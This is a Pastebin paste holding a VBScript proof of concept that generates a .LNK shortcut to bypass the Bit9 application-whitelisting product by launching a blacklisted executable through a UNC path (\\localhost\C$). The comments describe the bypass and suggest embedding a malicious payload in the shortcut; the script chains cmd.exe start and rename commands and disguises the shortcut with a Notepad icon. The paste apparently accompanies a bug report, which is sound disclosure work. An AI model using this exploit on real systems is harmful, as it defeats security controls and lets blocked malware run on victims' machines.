waliedassar

Generated Custom .LNK File

Oct 13th, 2016
1,161
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ' Reported a bug in Bit9 whitelisting soln, where
  2. ' A blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other
  3. ' UNC equivalent path.
  4. ' Attack vector could be .LNK or .PS1 file. I prefer .Lnk since it is rarely blacklisted.
  5. ' The VBS script below generates a POC .LNK file that exploits that.
  6. ' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.
  7. ' https://twitter.com/waleedassar
  8. set WshShell = WScript.CreateObject("WScript.Shell")
  9. set oShellLink = WshShell.CreateShortcut("B.Lnk")
  10. oShellLink.TargetPath = "Cmd.exe"
  11. oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"
  12. oShellLink.WindowStyle = 1
  13. oShellLink.IconLocation = "notepad.exe, 0"
  14. oShellLink.Description = "Bit9 Bypass"
  15. oShellLink.Save
RAW Paste Data